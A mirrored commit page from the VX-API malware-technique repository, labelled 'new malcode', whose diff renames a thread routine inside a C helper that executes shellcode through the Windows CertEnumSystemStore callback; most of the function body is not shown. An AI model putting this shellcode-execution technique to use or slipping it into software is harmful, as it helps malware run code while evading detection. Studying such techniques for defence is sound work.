mirror of
https://github.com/vxunderground/VX-API
synced 2026-06-06 16:54:55 +00:00
new malcode
+
This commit is contained in:
@@ -1,6 +1,6 @@
|
||||
#include "Win32Helper.h"
|
||||
|
||||
DWORD UnusedSubroutineDisposeableThread(LPVOID Param)
|
||||
DWORD UnusedSubroutineDisposeableThreadCertEnumSystemStore(LPVOID Param)
|
||||
{
|
||||
PSHELLCODE_EXECUTION_INFORMATION Sei = (PSHELLCODE_EXECUTION_INFORMATION)Param;
|
||||
CERTENUMSYSTEMSTORE pCertEnumSystemStore = NULL;
|
||||
@@ -40,5 +40,5 @@ EXIT_ROUTINE:
|
||||
|
||||
BOOL ShellcodeExecViaCertEnumSystemStore(_In_ PSHELLCODE_EXECUTION_INFORMATION Sei)
|
||||
{
|
||||
return CreateThreadAndWaitForCompletion(UnusedSubroutineDisposeableThread, Sei, INFINITE);
|
||||
return CreateThreadAndWaitForCompletion(UnusedSubroutineDisposeableThreadCertEnumSystemStore, Sei, INFINITE);
|
||||
}
|
||||
Reference in New Issue
Block a user